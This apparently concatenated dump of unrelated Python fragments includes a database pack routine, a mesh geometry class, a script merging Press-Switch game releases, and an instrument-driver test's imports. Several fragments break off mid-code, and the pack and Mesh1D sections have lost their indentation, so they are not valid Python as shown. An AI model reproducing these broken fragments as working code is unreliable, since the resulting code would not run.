        self._traverse_graph(load_connection, store_connection)
def _find_pack_tid(self):
"""If pack was not completed, find our pack tid again"""
# pack (below) ignores its pack_tid argument, so we can safely
# return None here
return None
__find_zoid_to_delete_query = Schema.pack_object.select(
it.c.zoid
).where(
it.c.keep == False # pylint:disable=singleton-comparison
).order_by(
it.c.zoid
)
# This query is used to feed ``packed_func``, which is used
# to normalize the local cache.
__find_zoid_tid_to_delete_query = Schema.pack_object.select(
it.c.zoid, it.c.keep_tid
).where(
it.c.keep == False # pylint:disable=singleton-comparison
).order_by(
it.c.zoid
)
@metricmethod
def pack(self, pack_tid, packed_func=None):
"""Run garbage collection.
Requires the information provided by pre_pack.
"""
# pylint:disable=too-many-locals
# Read committed mode is sufficient.
store_connection = StoreConnection(self.connmanager)
try: # pylint:disable=too-many-nested-blocks
try:
# On PostgreSQL, this uses the index
# ``pack_object_keep_false`` So if there's lots of
# garbage, this only touches a small part of the table
# and is surprisingly fast (it doesn't even need to
# sort); between 40s (cached) and 2 minutes (uncached)
# on a pack_object containing 60MM rows.
#
# Attempting to join these results against the
# object_state table and do the delete in one shot
# (60MM rows, half garbage) took more than 24 hours
# against a remote PostgreSQL database (before I killed it), the
# same one that ran the above query in 40s. It appears
# to spend a lot of time checkpointing (each
# checkpoint takes an hour!) Even on a faster
# database, that's unlikely to be suitable for production.
#
# Breaking it into chunks, as below, took about an hour.
logger.debug("pack: Fetching objects to remove.")
with self._make_ss_load_cursor(store_connection) as cursor:
with _Progress('execute') as progress:
self.__find_zoid_to_delete_query.execute(cursor)
progress.mark('download')
to_remove = OidList(row[0] for row in cursor)
# On postgres, with a regular cursor, fetching 32,502,545 objects to remove
# took 56.7s (execute: 50.8s; download 5.8s; memory delta 1474.82 MB);
# The second time took half of that.
# Switching to a server side cursor brought that to
# fetched 32,502,545 objects to remove in
# 41.74s (execute: 0.00s; download 41.74s; memory delta 257.21 MB)
total = len(to_remove)
logger.debug(
"pack: fetched %d objects to remove in %.2fs "
"(execute: %.2fs; download %.2fs; memory delta %s)",
total,
progress.duration,
progress.phase_duration('execute'),
progress.phase_duration('download'),
progress.total_memory_delta_display,
)
logger.info("pack: will remove %d object(s)", total)
# We used to hold the commit lock and do this in | |
"""Defines N-1 dimensional surfaces in N-dimensional space.
All surfaces are represented by a Mesh with points and connections (i.e. line segments or triangles) between those points.
"""
import numpy as np
from scipy import sparse, linalg
from nibabel import freesurfer, spatialimages, gifti
import nibabel as nib
from operator import xor
import datetime
import tempfile
import numba
from scipy import spatial, optimize
from six import string_types
from pathlib import Path
from .utils import signed_tetrahedral_volume
from copy import deepcopy
from loguru import logger
class Mesh(object):
    """General mesh object.
    Defines methods that are independent of the number of dimensions.
    Vertices are stored one per column ((ndim, nvertices) array) and faces as
    columns of vertex indices (2 rows for line segments, 3 for triangles).
    """
    # (ndim, nvertices) coordinates of the vertices in the embedding space
    vertices = None
    # (K, nfaces) index array of the surface elements
    faces = None
    # cached vertex<->face sparse graph (filled by graph_connection_point)
    _graph = None
    # cache slot for surface normals (not computed in this base class)
    _normal = None
    # cached KD-tree over the vertices (filled by the `tree` property)
    _tree = None
    @property
    def nvertices(self, ):
        """
        Number of vertices on the mesh
        """
        return self.vertices.shape[1]
    @property
    def ndim(self, ):
        """
        Dimensionality of the embedding space
        """
        return self.vertices.shape[0]
    @property
    def nfaces(self, ):
        """
        Number of surface elements connecting the vertices.
        """
        return self.faces.shape[1]
    def graph_connection_point(self, dtype='bool'):
        """
        Returns the interactions between vertices and faces as a sparse matrix.
        The resulting matrix can be used to multiply a vector of size M faces to get a vector of size N vertices.
        The result of this method is cached in _graph (set _graph to None to re-compute the graph).
        :param dtype: data type of the resulting sparse matrix
        :return: (N, M) sparse matrix for N vertices and M faces, which is one if connection M interacts with N.
        """
        if self._graph is not None:
            return self._graph.astype(dtype)
        # One entry per (vertex, face) incidence: row = vertex id, col = face id.
        rows = self.faces.flatten()
        cols = (np.ones(self.faces.shape[0])[:, None] * np.arange(self.nfaces)[None, :]).flatten().astype('i4')
        data = np.ones(rows.size, dtype='bool')
        res = sparse.coo_matrix((data, (rows, cols)),
                                shape=(self.nvertices, self.nfaces)).tocsr()
        self._graph = res
        return res.astype(dtype)
    def graph_point_point(self, weight=None, dtype='bool', include_diagonal=True):
        """
        Converts the mesh into a graph describing the edges between the individual vertices (nodes).
        :param weight: Weights the boundaries by the distance between the vertices if set to "distance"
        :param dtype: datatype of the resulting sparse matrix (only used if `weight` is None)
        :param include_diagonal: if set to False exclude the diagonal from the sparse matrix
        :return: (N, N) sparse matrix for N vertices, which is one (or the value set by `weight`) if the vertices are connected.
        """
        # Two vertices are connected iff they share at least one face.
        pc_graph = self.graph_connection_point(dtype=dtype)
        pp_graph = pc_graph * pc_graph.T
        if not include_diagonal:
            pp_graph.setdiag(False)
            pp_graph.eliminate_zeros()
        if weight is not None:
            graph_as_coo = pp_graph.tocoo()
            if weight == 'distance':
                # Euclidean distance between the two endpoints of each edge.
                weight = np.sqrt(np.sum((self.vertices[:, graph_as_coo.row] - self.vertices[:, graph_as_coo.col]) ** 2, 0))
            graph_as_coo.data = weight * np.ones_like(graph_as_coo.data)
            pp_graph = graph_as_coo.tocsr()
        return pp_graph
    def graph_connection_connection(self, weight=None, dtype='bool'):
        """
        Converts the mesh into a graph, where the nodes are the faces and the edges are between those faces sharing vertices.
        :param weight: Weights the boundaries by the distance between the connection centers if set to "distance"
        :param dtype: datatype of the resulting sparse matrix (only used if `weight` is None)
        :return: (N, N) sparse matrix for N faces, which is one (or the value set by `weight`) if the faces share a vertex.
        """
        pc_graph = self.graph_connection_point(dtype=dtype)
        cc_graph = pc_graph.T * pc_graph
        if weight is not None:
            graph_as_coo = cc_graph.tocoo()
            if weight == 'distance':
                # Distance between the centroids of the two faces.
                positions = np.mean(self.vertices[:, self.faces], 1)
                weight = np.sqrt(np.sum((positions[:, graph_as_coo.row] - positions[:, graph_as_coo.col]) ** 2, 0))
            graph_as_coo.data = weight * np.ones_like(graph_as_coo.data)
            cc_graph = graph_as_coo.tocsr()
        return cc_graph
    def surface_edge_distance(self, use=None, method='auto', return_predecessors=False, use_connections=False):
        """
        Returns a matrix of the shortest distances across the edges connecting the vertices.
        This is an upper limit to the true distance across the surface,
        because the path is limited to following the edges of the triangular mesh.
        This is a wrapper around `scipy.sparse.csgraph.shortest_path`.
        :param use: boolean array indicating which vertices or faces to use (default: use all)
        :param method: method used by `scipy.sparse.csgraph.shortest_path`.
        :param return_predecessors: whether to return the (N, N) predecessor matrix
        :param use_connections: compute the shortest distance between the faces rather than the vertices.
        :return: tuple of (cluster labels, list of per-cluster distance matrices);
            see the NOTE below about the unreachable single-matrix return.
        """
        if use_connections:
            graph = self.graph_connection_connection(weight="distance")
        else:
            graph = self.graph_point_point(weight="distance")
        if use is not None:
            graph = graph[use, :][:, use]
        # NOTE(review): `nclusters` is computed but never used.
        nclusters, labels = sparse.csgraph.connected_components(graph, directed=False)
        distance = []
        for ixcluster in range(np.amax(labels) + 1):
            # Shortest paths are computed per connected component, since
            # distances between components are infinite anyway.
            use = labels == ixcluster
            distance.append(sparse.csgraph.shortest_path(graph[use, :][:, use], method=method,
                                                         return_predecessors=return_predecessors))
        return labels, distance
        # NOTE(review): the return below is unreachable -- presumably an
        # ``if nclusters > 1:`` guard around the loop above was intended, so
        # that a fully connected mesh returns a single matrix as the original
        # docstring promised. TODO confirm against callers before changing.
        return sparse.csgraph.shortest_path(graph, method=method, return_predecessors=return_predecessors)
    def size_vertices(self, ):
        """
        Attributes the size of the faces to the vertices they connect.
        """
        # Each face's size is split evenly over its faces.shape[0] corner vertices.
        return self.graph_connection_point() * self.size_faces() / self.faces.shape[0]
    def connected_components(self, ):
        """
        Returns a tuple with (number of connected components, labeling of connected components).
        """
        return sparse.csgraph.connected_components(self.graph_point_point())
    def closed(self, ):
        """
        Checks if the mesh is closed.
        """
        # Subclasses define what "closed" means for their dimensionality.
        raise NotImplementedError("No generic implementation for N-dimensional mesh")
    @property
    def tree(self, ):
        """
        A KD tree used to compute the distance between the vertices defining the surface and any other vertices
        :rtype: scipy.spatial.cKDTree
        """
        if self._tree is None:
            self._tree = spatial.cKDTree(self.vertices.T)
        return self._tree
    def closest_vertex(self, points):
        """
        Finds the closest vertices on the surface for a bunch of vertices
        :param points: (ndim, nvertices) array with the reference vertices
        :return: tuple with
        - (nvertices, ) distance array
        - (nvertices, ) index array
        """
        return self.tree.query(points.T)
class Mesh1D(Mesh):
"""
1-dimensional mesh object consisting of vertices and lines connecting these vertices
Attributes:
`vertices`: (M, N) array with the vertices of the curve in M-dimensional space.
`faces`: (2, K) index array with all the line segments.
"""
def __init__(self, vertices, faces='open'):
"""
Creates a new curve
:param vertices: (M, N) array with N vertices on a one-dimensional curve in M-dimensional space
:param faces: (2, K) array with integers of which lines are connected
If faces is:
- 'open': defaults to connecting all vertices in order
- 'closed': defaults to connecting all vertices in order and connect the last point to the first
"""
self.vertices = np.asarray(vertices)
if faces == 'open':
faces = np.array([np.arange(self.vertices.shape[1] - 1), np.arange(1, self.vertices.shape[1])])
elif faces == 'closed':
faces = np.array([np.arange(self.vertices.shape[1]), np.roll(np.arange(self.vertices.shape[1]), -1)])
self.faces = faces
if self.ndim > self.nvertices + 3:
raise ValueError('N(dimensions) >> N(vertices), you should probably transpose the vertices array')
if self.faces.shape[0] != 2:
raise ValueError('1D-mesh faces should have shape (2, K), not %s' % self.faces.shape)
if self.vertices.ndim != 2 or self.faces.ndim != 2:
raise ValueError('vertices and faces should be 2-dimensional')
def size_faces(self, ):
    """
    Computes the size of the line segments connecting the vertices.

    NOTE(review): this returns the *squared* Euclidean segment length
    (sum of squared coordinate differences — there is no sqrt), although
    the original wording said "length". Confirm what callers expect
    before changing it.

    :return: (K, ) array with one value per face
    """
    # vertices is (ndim, N); pick both endpoints of every face and sum the
    # squared differences over the coordinate axis (axis 0).
    return np.sum((self.vertices[:, self.faces[0, :]] - self.vertices[:, self.faces[1, :]]) ** 2, 0)
def as_lines(self, as_indices=False):
    """
    Return the connected vertices as a list of curves.

    Starts with every vertex as its own single-element polyline, then merges
    polylines pairwise along each face until only maximal curves remain.

    :param as_indices: Returns the indices of the vertices rather than the vertices themselves
    :return: List[Array], where each entry is an (L, ) index array if as_indices
        is True, or an (ndim, L) coordinate array otherwise
    """
    # One polyline per vertex to start with.
    lines = [[ixpoint] for ixpoint in np.arange(self.nvertices)]
    for connection in self.faces.T:
        start = None
        end = None
        # Locate the polyline that currently ENDS at connection[0] and the
        # one that STARTS at connection[1]; in a well-formed 1D mesh both
        # exist, since every vertex is an endpoint of some polyline here.
        for ixline, line in enumerate(lines):
            if connection[1] == line[0]:
                end = ixline
            if connection[0] == line[-1]:
                start = ixline
        # start == end means this face closes a loop: nothing to merge.
        if start != end:
            lines[start].extend(lines[end])
            lines.pop(end)
    if as_indices:
        return [np.array(line) for line in lines]
    return [self.vertices[:, np.array(line)] for line in lines]
def closed(self, ):
    """
    Check whether the 1D mesh is closed.

    A mesh counts as closed when no vertex is a loose end, i.e. every vertex
    participates in zero or at least two line segments.
    """
    faces_per_vertex = np.sum(self.graph_connection_point(), -1)
    loose_ends = faces_per_vertex == 1
    return (~loose_ends).all()
def find_intersections(self, position, orientation, return_position=False):
"""
Finds out which faces intersection with position + a * hemisphere.
:param position: origin of the ray
:param orientation: propagation direction of the ray
:param return_position: if True also return the coordinates of the intersection
:return: (K, ) boolean array with the intercepted faces
"""
offset = self.vertices - position[:, None]
outer_product = offset[0, ...] * orientation[1] - offset[1, ...] * orientation[0]
intercepts = np.prod(np.sign(outer_product[self.faces]), 0) < 0
if not return_position:
return intercepts
use_offsets = offset[:, self.faces][:, :, intercepts]
if orientation[0] == 0:
result = -use_offsets[0, 0, :] / (use_offsets[0, 1, :] - use_offsets[0, 0, :])
else:
nominator = use_offsets[1, 0, :] - use_offsets[0, 0, :] * orientation[1] / orientation[0]
denominator = -(use_offsets[1, 1, :] - use_offsets[1, 0, :]) + (use_offsets[0, 1, :] - use_offsets[0, 0, :]) * orientation[1] / orientation[0]
result = nominator / | |
#-----------------------------------------------------------------------------
# press-stitch.py
# Merges the three Press Switch games together
# pylint: disable=bad-indentation
#-----------------------------------------------------------------------------
import getopt
import hashlib
import os.path
import pathlib
import shutil
import sys
import csv
import copy
import zipfile
import press_stitch_archive
import rpp
import backgrounds_map
# Mappings for 0.3 -> 0.5
import character_map_35_chris
import character_map_35_ciel
import character_map_35_eliza
import character_map_35_karyn
import character_map_35_main
import character_map_35_martha
import character_map_35_michelle
import character_map_35_mother
import character_map_35_nick
import character_map_35_vanessa
# Mappings for 0.4 -> 0.5
import character_map_45_alma
import character_map_45_amber
import character_map_45_anna
import character_map_45_april
import character_map_45_candice
import character_map_45_chris
import character_map_45_ciel
import character_map_45_cindy
import character_map_45_donald
import character_map_45_eliza
import character_map_45_erin
import character_map_45_ermach
import character_map_45_hillary
import character_map_45_jenna
import character_map_45_jennifer
import character_map_45_jillian
import character_map_45_karyn
import character_map_45_kayla
import character_map_45_main
import character_map_45_martha
import character_map_45_melina
import character_map_45_michelle
import character_map_45_mika
import character_map_45_mother
import character_map_45_nelson
import character_map_45_nick
import character_map_45_nurse
import character_map_45_sean
import character_map_45_vanessa
import character_map_45_waitress
# Mappings for 0.5 -> 0.6
import character_map_56_eliza
import character_map_56_main
# Base names (without the .zip extension) of the game releases to merge.
filename_03 = "Press-SwitchV0.3b-all";
filename_04 = "Press-SwitchV0.4a-pc";
filename_05 = "Press-SwitchV0.5c-pc";
filename_06 = "Press-SwitchV0.6";
# The key is the label used in an RPY "show" command to show a character.
# The value is the character directory used to find the images.
# Labels with a "d"/"flash"/"ghost" suffix are sprite variants that share
# the base character's image directory.
characterLabelMap = {
  "alma": "alma",
  "amber": "amber",
  "amberd": "amber",
  "anna": "anna",
  "april": "april",
  "candice": "candice",
  "candiced": "candice",
  "chris": "chris",
  "chrisd": "chris",
  "chrisghost": "chris",
  "ciel": "ciel",
  "cindy": "cindy",
  "donald": "donald",
  "donaldd": "donald",
  "donaldflash": "donald",
  "eliza": "eliza",
  "elizad": "eliza",
  "elizaflash": "eliza",
  "elizaghost": "eliza",
  "erin": "erin",
  "erind": "erin",
  "eringhost": "erin",
  "hillary": "hillary",
  "hillaryd": "hillary",
  "jenna": "jenna",
  "jennifer": "jennifer",
  "jenniferd": "jennifer",
  "jillian": "jillian",
  "jilliand": "jillian",
  "karyn": "karyn",
  "karynd": "karyn",
  "karynflash": "karyn",
  "karynghost": "karyn",
  "kayla": "kayla",
  "kaylad": "kayla",
  "main": "main",
  "maind": "main",
  "mainflash": "main",
  "mainghost": "main",
  "martha": "martha",
  "marthad": "martha",
  "marthaghost": "martha",
  "melina": "melina",
  "michelle": "michelle",
  "michelled": "michelle",
  "michelleghost": "michelle",
  "mika": "mika",
  "mikad": "mika",
  "mother": "mother",
  "nelson": "nelson",
  "nick": "nick",
  "nurse": "nurse",
  "sean": "sean",
  "vanessa": "vanessa",
  "vanessad": "vanessa",
  "waitress": "waitress"
};
# Map showing whether to remap the character based on RenPy variables.
# True only for the "...d" (disguise) variants, whose displayed character
# follows the corresponding <X>.display variable at runtime.
characterDoRemap = {
  "alma": False,
  "amber": False,
  "amberd": True,
  "anna": False,
  "april": False,
  "candice": False,
  "candiced": True,
  "chris": False,
  "chrisd": True,
  "chrisghost": False,
  "ciel": False,
  "cindy": False,
  "donald": False,
  "donaldd": True,
  "donaldflash": False,
  "eliza": False,
  "elizad": True,
  "elizaflash": False,
  "elizaghost": False,
  "erin": False,
  "erind": True,
  "eringhost": False,
  "hillary": False,
  "hillaryd": True,
  "jenna": False,
  "jennifer": False,
  "jenniferd": True,
  "jillian": False,
  "jilliand": True,
  "karyn": False,
  "karynd": True,
  "karynflash": False,
  "karynghost": False,
  "kayla": False,
  "kaylad": True,
  "main": False,
  "maind": True,
  "mainflash": False,
  "mainghost": False,
  "martha": False,
  "marthad": True,
  "marthaghost": False,
  "melina": False,
  "michelle": False,
  "michelled": True,
  "michelleghost": False,
  "mika": False,
  "mikad": True,
  "mother": False,
  "nelson": False,
  "nick": False,
  "nurse": False,
  "sean": False,
  "vanessa": False,
  "vanessad": True,
  "waitress": False,
};
# Per-character image-name mappings for upgrading 0.3 assets to 0.5.
characterImageMap35 = {
  "chris": character_map_35_chris.characterMapChris,
  "ciel": character_map_35_ciel.characterMapCiel,
  "eliza": character_map_35_eliza.characterMapEliza,
  "karyn": character_map_35_karyn.characterMapKaryn,
  "main": character_map_35_main.characterMapMain,
  "martha": character_map_35_martha.characterMapMartha,
  "michelle": character_map_35_michelle.characterMapMichelle,
  "mother": character_map_35_mother.characterMapMother,
  "nick": character_map_35_nick.characterMapNick,
  "vanessa": character_map_35_vanessa.characterMapVanessa,
};
# Per-character image-name mappings for upgrading 0.4 assets to 0.5.
# NOTE(review): "ermach" has a map here but no characterLabelMap entry —
# confirm whether that label can actually appear in a show command.
characterImageMap45 = {
  "alma": character_map_45_alma.characterMapAlma,
  "amber": character_map_45_amber.characterMapAmber,
  "anna": character_map_45_anna.characterMapAnna,
  "april": character_map_45_april.characterMapApril,
  "candice": character_map_45_candice.characterMapCandice,
  "chris": character_map_45_chris.characterMapChris,
  "ciel": character_map_45_ciel.characterMapCiel,
  "cindy": character_map_45_cindy.characterMapCindy,
  "donald": character_map_45_donald.characterMapDonald,
  "eliza": character_map_45_eliza.characterMapEliza,
  "erin": character_map_45_erin.characterMapErin,
  "ermach": character_map_45_ermach.characterMapErmach,
  "hillary": character_map_45_hillary.characterMapHillary,
  "jenna": character_map_45_jenna.characterMapJenna,
  "jennifer": character_map_45_jennifer.characterMapJennifer,
  "jillian": character_map_45_jillian.characterMapJillian,
  "karyn": character_map_45_karyn.characterMapKaryn,
  "kayla": character_map_45_kayla.characterMapKayla,
  "main": character_map_45_main.characterMapMain,
  "martha": character_map_45_martha.characterMapMartha,
  "melina": character_map_45_melina.characterMapMelina,
  "michelle": character_map_45_michelle.characterMapMichelle,
  "mika": character_map_45_mika.characterMapMika,
  "mother": character_map_45_mother.characterMapMother,
  "nelson": character_map_45_nelson.characterMapNelson,
  "nick": character_map_45_nick.characterMapNick,
  "nurse": character_map_45_nurse.characterMapNurse,
  "sean": character_map_45_sean.characterMapSean,
  "vanessa": character_map_45_vanessa.characterMapVanessa,
  "waitress": character_map_45_waitress.characterMapWaitress
};
# Per-character image-name mappings for upgrading 0.5 assets to 0.6.
characterImageMap56 = {
  "eliza": character_map_56_eliza.characterMapEliza,
  "main": character_map_56_main.characterMapMain,
};
# Initial state of RenPy variables (each <X>.display names the character
# sprite currently shown for that person).
pyVariables = {
  "Al.display": "alma",
  "Am.display": "amber",
  "Can.display": "candice",
  "ch.display": "chris",
  "Do.display": "donald",
  "e.display": "eliza",
  "er.display": "erin",
  "hi.display": "hillary",
  "je.display": "jennifer",
  "ji.display": "jillian",
  "k.display": "karyn",
  "ka.display": "kayla",
  "ma.display": "martha",
  "m.display": "mika",
  "M.display": "main",
  "mic.display": "michelle",
  "Nel.display": "nelson",
  "nur2.display": "nurse",
  "Te.display": "teacher",
  "v.display": "vanessa"
};
# Association of person name to RenPy display variable (inverse of the
# pyVariables initial mapping).
# NOTE(review): "teacher" ("Te.display") has no characterLabelMap entry — confirm.
personDispVars = {
  "alma": "Al.display",
  "amber": "Am.display",
  "candice": "Can.display",
  "chris": "ch.display",
  "donald": "Do.display",
  "eliza": "e.display",
  "erin": "er.display",
  "hillary": "hi.display",
  "jennifer": "je.display",
  "jillian": "ji.display",
  "karyn": "k.display",
  "kayla": "ka.display",
  "martha": "ma.display",
  "mika": "m.display",
  "main": "M.display",
  "michelle": "mic.display",
  "nelson": "Nel.display",
  "nurse": "nur2.display",
  "teacher": "Te.display",
  "vanessa": "v.display"
};
# List of active threads
threads = [];
# List of label call objects
labelCalls = [];
# When True, errors are annotated inline in the output instead of aborting.
inlineErrors = False;
#-----------------------------------------------------------------------------
def printRed(s):
  #type: (str) -> None
  """Print *s* to stdout wrapped in ANSI bold-red escape codes."""
  print("\033[1;31m%s\033[0m" % s)
#-----------------------------------------------------------------------------
def showError(txt):
  #type: (str) -> None
  """Print *txt* to stdout as a red "Error:" message."""
  printRed("Error: %s" % txt)
#-----------------------------------------------------------------------------
def flagError(rpFile, lineNum, txt):
  #type: (rpp.RenPyFile, int, str) -> str
  """Report an error found at *lineNum* of *rpFile*.

  When the global inlineErrors flag is set, returns the offending source
  line annotated with the error text; otherwise the process exits with
  status 1.
  """
  showError("Line %d: %s" % (lineNum, txt))
  if not inlineErrors:
    sys.exit(1)
  return rpFile.lines[lineNum].strip('\n') + " # ERROR: " + txt + "\n"
#-----------------------------------------------------------------------------
def md5(fname):
  #type: (str) -> str
  """Return the hex MD5 digest of the file at *fname*, read in 4 KiB chunks."""
  digest = hashlib.md5()
  with open(fname, "rb") as handle:
    chunk = handle.read(4096)
    while chunk:
      digest.update(chunk)
      chunk = handle.read(4096)
  return digest.hexdigest()
#-----------------------------------------------------------------------------
def verifySingleFile(filename, desiredHash):
  #type: (str, str) -> bool
  """Check that *filename* exists and that its MD5 digest equals *desiredHash*.

  Prints progress and diagnostics; returns True on success, False otherwise.
  """
  print("Verifying " + filename + "...")
  if not os.path.exists(filename):
    showError("File does not exist!")
    return False
  actualHash = md5(filename)
  if actualHash == desiredHash:
    print("Succeeded")
    return True
  showError("Checksum is not correct, please download the file again")
  print("Desired MD5: " + desiredHash)
  print("Actual MD5 : " + actualHash)
  return False
#-----------------------------------------------------------------------------
def unzipFile(filename):
  #type: (str) -> None
  """Extract every member of ZIP archive *filename* into the current directory."""
  print("Unzipping file %s..." % filename)
  archive = zipfile.ZipFile(filename, 'r')
  try:
    archive.extractall(".")
  finally:
    archive.close()
#-----------------------------------------------------------------------------
def removeDir(filename):
  #type: (str) -> None
  """Recursively delete directory *filename*; silently do nothing if absent."""
  if not os.path.isdir(pathlib.Path(filename)):
    return
  print("Removing directory " + filename + "...")
  shutil.rmtree(filename)
#-----------------------------------------------------------------------------
def checkFile(dirname, checksum):
  #type: (str, str) -> bool
  """Ensure the game directory *dirname* exists.

  Extracts "<dirname>.zip" after verifying its MD5 *checksum* when the
  directory is missing; returns False when verification fails.
  """
  if os.path.isdir(pathlib.Path(dirname)):
    print("Directory " + dirname + " exists, ZIP extract skipped")
    return True
  archiveName = dirname + ".zip"
  if not verifySingleFile(archiveName, checksum):
    return False
  unzipFile(archiveName)
  return True
#-----------------------------------------------------------------------------
def doMakeDir(path):
  #type: (str) -> None
  """Create directory *path* unless it already exists."""
  if os.path.isdir(pathlib.Path(path)):
    print("Directory " + path + " already exists, skipping creation")
    return
  print("Creating directory " + path)
  os.mkdir(path)
#-----------------------------------------------------------------------------
def doCopyFile(srcPath, dstPath, filename):
  #type: (str, str, str) -> None
  """Copy *filename* from directory *srcPath* into directory *dstPath*."""
  source = os.path.join(srcPath, filename)
  print("Copying file %s into %s" % (source, dstPath))
  shutil.copy(source, dstPath)
#-----------------------------------------------------------------------------
def isNumberField(s):
  #type: (str) -> bool
  """Return True when *s* consists solely of ASCII digits.

  Note: the empty string counts as numeric (matches the historical behavior;
  str.isdigit would differ on "" and on non-ASCII digits).
  """
  return all(c in "0123456789" for c in s)
#-----------------------------------------------------------------------------
def expandNumberField(s):
  #type: (str) -> str
  """Zero-pad a purely numeric field to 3 characters; leave other fields unchanged."""
  return s.zfill(3) if isNumberField(s) else s
#-----------------------------------------------------------------------------
def getIndentOf(line):
  #type: (str) -> int
  """Return the number of leading space characters in *line* (tabs are not counted)."""
  return len(line) - len(line.lstrip(' '))
#-----------------------------------------------------------------------------
def processCommand(rpFile, thread, lineNum, line):
  #type: (rpp.RenPyFile, rpp.RenPyThread, int, str) -> None
  """Interpret a single RenPy python command line, updating thread state.

  Two command shapes are handled:
    * ``ui.timer(...) ui.jumps("label")`` pairs, recorded as a label call;
    * simple variable assignments (``var = value``, ``var += n``, ``var -= n``).
  Any other operator is flagged as an error via flagError.
  """
  # csv.reader gives quote-aware splitting on spaces (quoted values with
  # embedded spaces stay in one field).
  fields = list(csv.reader([line], delimiter=' '))[0];
  if (len(fields) < 2):
    return;
  # Try for a UI timer jump
  if (fields[0].startswith("ui.timer(") and fields[1].startswith("ui.jumps(")):
    jumpLabel = fields[1].split('"')[1];
    addLabelCall(rpFile, jumpLabel, thread);
    return;
  # Try for a variable assignment
  if (len(fields) < 3):
    return;
  pyVar = fields[0].strip();
  # Strip surrounding double or single quotes from the assigned value.
  pyVal = fields[2].strip().strip('"').strip('\'');
  #print(str(lineNum) + ": Command " + str(fields));
  if (fields[1] == "="):
    thread.vars[pyVar] = pyVal;
    #print("Variable '" + pyVar + "' becomes '" + pyVal + "'");
  elif (fields[1] == "+="):
    # Compound assignment requires the variable to exist already; values are
    # kept as strings, so convert for the arithmetic and back again.
    if not(pyVar in thread.vars):
      flagError(rpFile, lineNum, "Variable '" + pyVar + "' not found in thread");
    thread.vars[pyVar] = str(int(thread.vars[pyVar]) + int(pyVal));
  elif (fields[1] == "-="):
    if not(pyVar in thread.vars):
      flagError(rpFile, lineNum, "Variable '" + pyVar + "' not found in thread");
    thread.vars[pyVar] = str(int(thread.vars[pyVar]) - int(pyVal));
  else:
    flagError(rpFile, lineNum, "Unsupported operator '" + fields[1] + "', line is: " + line);
#-----------------------------------------------------------------------------
def calculateCondition(thread, lineNum, fields):
  #type: (rpp.RenPyThread, int, list[str]) -> bool
  """Evaluate a restricted RenPy ``if``/``elif`` condition against thread variables.

  Supports clauses of the form ``var == value`` (with one optional extra
  comma-separated value) and ``var >= value``, joined only by ``or``.
  Unsupported operators abort the program.
  """
  offset = 1;  # fields[0] is the "if"/"elif" keyword itself
  while(offset < len(fields)):
    varname = fields[offset];
    condition = fields[offset + 1];
    value = fields[offset + 2];
    if not(varname in thread.vars):
      # NOTE(review): an unknown variable makes the WHOLE condition false,
      # even if a later "or" clause would have matched — confirm intended.
      return False;
    if (condition == "=="):
      cont = False;
      # A trailing comma means "value1, value2": either value matches.
      if (value[-1] == ","):
        cont = True;
        value = value.strip(',');
      if (thread.vars[varname] == value.strip('"').strip('\'')):
        return True;
      if (cont):
        # Consume the extra value token; only ONE continuation is supported.
        offset = offset + 1;
        value = fields[offset + 2];
        if (thread.vars[varname] == value.strip('"').strip('\'')):
          return True;
    elif (condition == ">="):
      # Numeric comparison: stored values are strings, so convert both sides.
      if (int(thread.vars[varname]) >= int(value.strip('"').strip('\''))):
        return True;
    else:
      showError("Condition " + condition + " not supported");
      sys.exit(1);
    offset = offset + 3;
    # Clauses may only be joined with "or".
    if ((offset < len(fields) and not(fields[offset] == "or"))):
      showError(str(lineNum) + ": Boolean operator " + fields[offset] + " not supported, fields are " + str(fields));
      sys.exit(1);
    offset = offset + 1;
  return False;
#-----------------------------------------------------------------------------
def processIfStep(rpFile, thread):
  #type: (rpp.RenPyFile, rpp.RenPyThread) -> None
  """Execute one step of an if/elif/else chain on top of the thread's stack.

  The top-of-stack block object tracks the current line and indent of the
  conditional. A matching branch pushes a new block for its body and
  advances the line pointer past that body; leaving the chain pops the
  conditional off the stack.
  """
  obj = thread.stack[-1];
  # Keyword/condition part only — drop everything after the ':'.
  line = rpFile.lines[obj.lineNum].split(':')[0];
  fields = line.split();
  # Are we still in the block?
  if (not(rpFile.indentIsGood(obj.lineNum, obj.indent))):
    thread.stack.pop(); # Kill the IF
    return;
  # Call the "if" hook to see if the file has special processing
  rpFile.hookIf(thread);
  if((fields[0] == "if") or (fields[0] == "elif")):
    condition = calculateCondition(thread, obj.lineNum, fields);
    # hasExecuted latches after the first matching branch, so later elif/else
    # branches of the same chain are skipped even if their condition holds.
    if (condition and not(obj.hasExecuted)):
      obj.hasExecuted = True;
      thread.stack.append(rpp.RenPyBlock(obj.lineNum + 1, obj.indent + 4));
      obj.lineNum = rpFile.blockEndLine(obj.lineNum + 1, obj.indent + 4);
  elif (fields[0] == "else"):
    if not(obj.hasExecuted):
      thread.stack.append(rpp.RenPyBlock(obj.lineNum + 1, obj.indent + 4));
      obj.lineNum = rpFile.blockEndLine(obj.lineNum + 1, obj.indent + 4);
      return;
    thread.stack.pop();
  else:
    # Must have finished the block
    thread.stack.pop();
#-----------------------------------------------------------------------------
def | |
# <gh_stars>0  (stray scaffold marker; commented out so the module parses)
"""
@package mi.instrument.teledyne.workhorse_monitor_75_khz.test.test_driver
@author <NAME>
"""
__author__ = '<NAME>'
__license__ = 'Apache 2.0'
import socket
import unittest
import time as time
import datetime as dt
from mi.core.time import get_timestamp_delayed
from nose.plugins.attrib import attr
from mock import Mock
from mi.core.instrument.chunker import StringChunker
from mi.core.instrument.instrument_driver import DriverEvent
from mi.core.log import get_logger; log = get_logger()
# MI imports.
from mi.idk.unit_test import AgentCapabilityType
from mi.idk.unit_test import InstrumentDriverTestCase
from mi.idk.unit_test import InstrumentDriverUnitTestCase
from mi.idk.unit_test import InstrumentDriverIntegrationTestCase
from mi.idk.unit_test import InstrumentDriverQualificationTestCase
from mi.idk.unit_test import ParameterTestConfigKey
from mi.idk.unit_test import DriverStartupConfigKey
from mi.instrument.teledyne.test.test_driver import TeledyneUnitTest
from mi.instrument.teledyne.test.test_driver import TeledyneIntegrationTest
from mi.instrument.teledyne.test.test_driver import TeledyneQualificationTest
from mi.instrument.teledyne.test.test_driver import TeledynePublicationTest
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import WorkhorseInstrumentDriver
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import DataParticleType
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import TeledyneProtocolState
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import TeledyneProtocolEvent
